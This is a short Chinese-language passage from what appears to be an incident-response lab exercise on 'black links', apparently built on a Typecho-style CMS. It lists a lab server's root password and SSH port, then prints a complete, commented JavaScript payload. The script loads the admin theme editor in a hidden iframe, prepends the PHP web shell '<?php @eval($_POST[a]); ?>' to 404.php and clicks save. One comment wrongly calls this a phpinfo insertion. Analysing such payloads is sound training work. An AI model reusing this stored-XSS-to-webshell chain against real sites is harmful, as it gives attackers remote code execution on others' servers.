第五章-Linux实战-黑链

1
2

服务器场景操作系统 Linux  
服务器账号密码 root xjty110pora 端口 2222  

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

// 定义一个函数，在网页末尾插入一个iframe元素  
function insertIframe() {  
    // 获取当前页面路径  
    var urlWithoutDomain = window.location.pathname;  
    // 判断页面是否为评论管理页面  
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");  
    var tSrc='';  
    if (hasManageComments){  
        // 如果是，则将路径修改为用于修改主题文件的页面地址  
        tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');  
    }else{  
        // 如果不是，则直接使用主题文件修改页面地址  
        tSrc='/admin/theme-editor.php?theme=default&file=404.php';  
    }  
    // 定义iframe元素的属性，包括id、src、width、height和onload事件  
    var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";  
    // 获取网页原始内容  
    var originalContent = document.body.innerHTML;  
    // 在网页末尾添加iframe元素  
    document.body.innerHTML = (originalContent + iframeAttributes);  
}  
  
// 定义一个全局变量isSaved，初始值为false  
var isSaved = false;  
  
// 定义一个函数，在iframe中写入一段PHP代码并保存  
function writeShell() {  
    // 如果isSaved为false  
    if (!isSaved) {   
        // 获取iframe内的内容区域和“保存文件”按钮元素  
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');  
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');      
        // 获取模板文件原始内容  
        var oldData = content.value;  
        // 在原始内容前加入一段phpinfo代码  
        content.value = ('<?php @eval($_POST[a]); ?>\n') + oldData;  
        // 点击“保存文件”按钮  
        btns[1].click();  
        // 将isSaved设为true，表示已经完成写入操作  
        isSaved = true;  
    }  
}  
// 调用insertIframe函数，向网页中添加iframe元素和写入PHP代码的事件  
insertIframe();